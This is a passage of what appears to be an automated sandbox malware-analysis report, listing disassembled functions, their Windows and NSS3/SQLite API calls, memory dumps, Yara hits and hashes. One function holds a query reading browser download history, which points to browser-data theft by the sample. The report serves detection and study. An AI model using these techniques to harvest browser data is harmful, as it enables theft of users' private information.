                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: 993e1cc2b0eda2e3c9f7e500b19c9b671f32c4fe837471e1e0636e20a0ca8211
                                                                                • Instruction ID: 17015beb40b3fb344214c81823c60b372919ce661b74714904955fc3bb30928b
                                                                                • Opcode Fuzzy Hash: 993e1cc2b0eda2e3c9f7e500b19c9b671f32c4fe837471e1e0636e20a0ca8211
                                                                                • Instruction Fuzzy Hash: B1F02E11F455382FD710009DEC14F82379D671136EF2954B1EA0DB7E92DB05D8A246E1
                                                                                Function 6C910C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(00000000,00000000,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?,?,00000000,?,?), ref: 6C910CB3
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?), ref: 6C910DC1
                                                                                • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?), ref: 6C910DEC
                                                                                  • Part of subcall function 6C930F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C8D2AF5,?,?,?,?,?,6C8D0A1B,00000000), ref: 6C930F1A
                                                                                  • Part of subcall function 6C930F10: malloc.MOZGLUE(00000001), ref: 6C930F30
                                                                                  • Part of subcall function 6C930F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C930F42
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910DFF
                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C911444,?,00000001,?,00000000), ref: 6C910E16
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910E53
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?,?,6C911444,?,?,00000000), ref: 6C910E65
                                                                                • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C911444,?,00000001,?,00000000,00000000,?), ref: 6C910E79
                                                                                  • Part of subcall function 6C921560: TlsGetValue.KERNEL32(00000000,?,6C8F0844,?), ref: 6C92157A
                                                                                  • Part of subcall function 6C921560: EnterCriticalSection.KERNEL32(?,?,?,6C8F0844,?), ref: 6C92158F
                                                                                  • Part of subcall function 6C921560: PR_Unlock.NSS3(?,?,?,?,6C8F0844,?), ref: 6C9215B2
                                                                                  • Part of subcall function 6C8EB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C8F1397,00000000,?,6C8ECF93,5B5F5EC0,00000000,?,6C8F1397,?), ref: 6C8EB1CB
                                                                                  • Part of subcall function 6C8EB1A0: free.MOZGLUE(5B5F5EC0,?,6C8ECF93,5B5F5EC0,00000000,?,6C8F1397,?), ref: 6C8EB1D2
                                                                                  • Part of subcall function 6C8E89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8E88AE,-00000008), ref: 6C8E8A04
                                                                                  • Part of subcall function 6C8E89E0: EnterCriticalSection.KERNEL32(?), ref: 6C8E8A15
                                                                                  • Part of subcall function 6C8E89E0: memset.VCRUNTIME140(6C8E88AE,00000000,00000132), ref: 6C8E8A27
                                                                                  • Part of subcall function 6C8E89E0: PR_Unlock.NSS3(?), ref: 6C8E8A35
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 1601681851-0
                                                                                • Opcode ID: 4c7b0083aad7fea1394ac610015e73f0ac5acdd636a70cf53b4556228453fe05
                                                                                • Instruction ID: 74d709556600fe1b4e66d7f41785c0b069ebde62a21e965560bfafef756b59de
                                                                                • Opcode Fuzzy Hash: 4c7b0083aad7fea1394ac610015e73f0ac5acdd636a70cf53b4556228453fe05
                                                                                • Instruction Fuzzy Hash: 7D51E8F5D002055FEB109F68DD82ABF37A8AF15258F151434EC1997B02FB36ED2987A2
                                                                                Function 6C8C6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_value_text.NSS3(?,?), ref: 6C8C6ED8
                                                                                • sqlite3_value_text.NSS3(?,?), ref: 6C8C6EE5
                                                                                • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C8C6FA8
                                                                                • sqlite3_value_text.NSS3(00000000,?), ref: 6C8C6FDB
                                                                                • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C8C6FF0
                                                                                • sqlite3_value_blob.NSS3(?,?), ref: 6C8C7010
                                                                                • sqlite3_value_blob.NSS3(?,?), ref: 6C8C701D
                                                                                • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C8C7052
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                • String ID:
                                                                                • API String ID: 1920323672-0
                                                                                • Opcode ID: 6322a826800139370b2461b0815d9b3e5ec6ad9d55ae93b65c1030d49950183c
                                                                                • Instruction ID: 9cd44f03134ca70ba54b1dbe93c53d105c3d8243b317c0eae589038ee57f523a
                                                                                • Opcode Fuzzy Hash: 6322a826800139370b2461b0815d9b3e5ec6ad9d55ae93b65c1030d49950183c
                                                                                • Instruction Fuzzy Hash: 1A61A1B1F1420A8FDB20CB68DA006FEB7B2AF55308F284575D415AB751E732DC16CBA2
                                                                                Function 6C938F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C937313), ref: 6C938FBB
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C8D8298,?,?,?,6C8CFCE5,?), ref: 6C9307BF
                                                                                  • Part of subcall function 6C9307B0: PL_HashTableLookup.NSS3(?,?), ref: 6C9307E6
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C93081B
                                                                                  • Part of subcall function 6C9307B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C930825
                                                                                • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C937313), ref: 6C939012
                                                                                • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C937313), ref: 6C93903C
                                                                                • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C93909E
                                                                                • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C9390DB
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C937313), ref: 6C9390F1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C937313), ref: 6C93906B
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C937313), ref: 6C939128
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                • String ID:
                                                                                • API String ID: 3590961175-0
                                                                                • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                • Instruction ID: ae3662310ed36b7f6153265d0b989680d6bd6dc816cae19239658e5fdb1b89dc
                                                                                • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                • Instruction Fuzzy Hash: 55519071A00221CFEB109F6ADC84B26B3F9AF54318F165029D95DD7B61EF35E904CBA1
                                                                                Function 0041612D Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416132
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                  • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                  • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                  • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                  • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                  • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268EC), ref: 00415ED6
                                                                                  • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,004268F0), ref: 00415EF0
                                                                                  • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2058169020-0
                                                                                • Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                • Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
                                                                                • Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                • Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64
                                                                                Function 6C8F4E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F4E90
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8F4EA9
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F4EC6
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8F4EDF
                                                                                • PL_HashTableLookup.NSS3 ref: 6C8F4EF8
                                                                                • PR_Unlock.NSS3 ref: 6C8F4F05
                                                                                • PR_Now.NSS3 ref: 6C8F4F13
                                                                                • PR_Unlock.NSS3 ref: 6C8F4F3A
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                • String ID:
                                                                                • API String ID: 326028414-0
                                                                                • Opcode ID: 8167ca546b2609c2160e2254ce6051149693a92f3a669a57b084e81f402b83a1
                                                                                • Instruction ID: ed5b5fa76a4aadba401b57e4cdb825f0927840bf73779837dfbf9d83b501d9af
                                                                                • Opcode Fuzzy Hash: 8167ca546b2609c2160e2254ce6051149693a92f3a669a57b084e81f402b83a1
                                                                                • Instruction Fuzzy Hash: 3A416DB4A047058FDB14DF78C6848AABBF0FF89354B058969DC599B710EB30E856CF91
                                                                                Function 6C958D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
                                                                                • String ID:
                                                                                • API String ID: 4163001165-0
                                                                                • Opcode ID: 9f94db5f4e9717467189212d19372aa53011038b84e482aa4697f0ab5fdd9b21
                                                                                • Instruction ID: abdf2278495424ef7824074ccd11a1d6ef0ee3b8e628fa656d00620c2b7037eb
                                                                                • Opcode Fuzzy Hash: 9f94db5f4e9717467189212d19372aa53011038b84e482aa4697f0ab5fdd9b21
                                                                                • Instruction Fuzzy Hash: C7A1F5716143019BE718DF24CC40BABB3F9EF58308F44492EE94ACB652E731E568C796
                                                                                Function 6C948C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C948C93
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                  • Part of subcall function 6C928A60: TlsGetValue.KERNEL32(6C8D61C4,?,6C8D5F9C,00000000), ref: 6C928A81
                                                                                  • Part of subcall function 6C928A60: TlsGetValue.KERNEL32(?,?,?,6C8D5F9C,00000000), ref: 6C928A9E
                                                                                  • Part of subcall function 6C928A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C8D5F9C,00000000), ref: 6C928AB7
                                                                                  • Part of subcall function 6C928A60: PR_Unlock.NSS3(?,?,?,?,?,6C8D5F9C,00000000), ref: 6C928AD2
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C948CFB
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C948D10
                                                                                  • Part of subcall function 6C928970: TlsGetValue.KERNEL32(?,00000000,6C8D61C4,?,6C8D5639,00000000), ref: 6C928991
                                                                                  • Part of subcall function 6C928970: TlsGetValue.KERNEL32(?,?,?,?,?,6C8D5639,00000000), ref: 6C9289AD
                                                                                  • Part of subcall function 6C928970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C8D5639,00000000), ref: 6C9289C6
                                                                                  • Part of subcall function 6C928970: PR_WaitCondVar.NSS3 ref: 6C9289F7
                                                                                  • Part of subcall function 6C928970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C8D5639,00000000), ref: 6C928A0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                • String ID:
                                                                                • API String ID: 2412912262-0
                                                                                • Opcode ID: 79fd64e06932f31e78b4cb72bbca7f1190c60d12aac613ae7ad1a639c7e603ff
                                                                                • Instruction ID: f2d954f78e3845f79e693915da11ed39fc1dd592a702d5d322ea5299ec0a7603
                                                                                • Opcode Fuzzy Hash: 79fd64e06932f31e78b4cb72bbca7f1190c60d12aac613ae7ad1a639c7e603ff
                                                                                • Instruction Fuzzy Hash: 85B16DB0D043089FDB19CF65DC40AAEB7BAEF58308F14812ED81AA7751E731E955CB94
                                                                                Function 004074E2 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004074E7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077B3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077C7
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                • API String ID: 3193997572-2241552939
                                                                                • Opcode ID: 4bafbb6a6d366c1abf6568586283c581c43a36d2cdaff67a2810fc17a686afab
                                                                                • Instruction ID: 1d83a0d3a3a48fb3eb3ae61e75267720847f9aac3d0a0fe70c8d3f25524eebd0
                                                                                • Opcode Fuzzy Hash: 4bafbb6a6d366c1abf6568586283c581c43a36d2cdaff67a2810fc17a686afab
                                                                                • Instruction Fuzzy Hash: 74B15D71904248EADB15EBE5D956BDDBBB4AF18308F50407EE406725C2DF782B0CCB26
                                                                                Function 6C8C2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
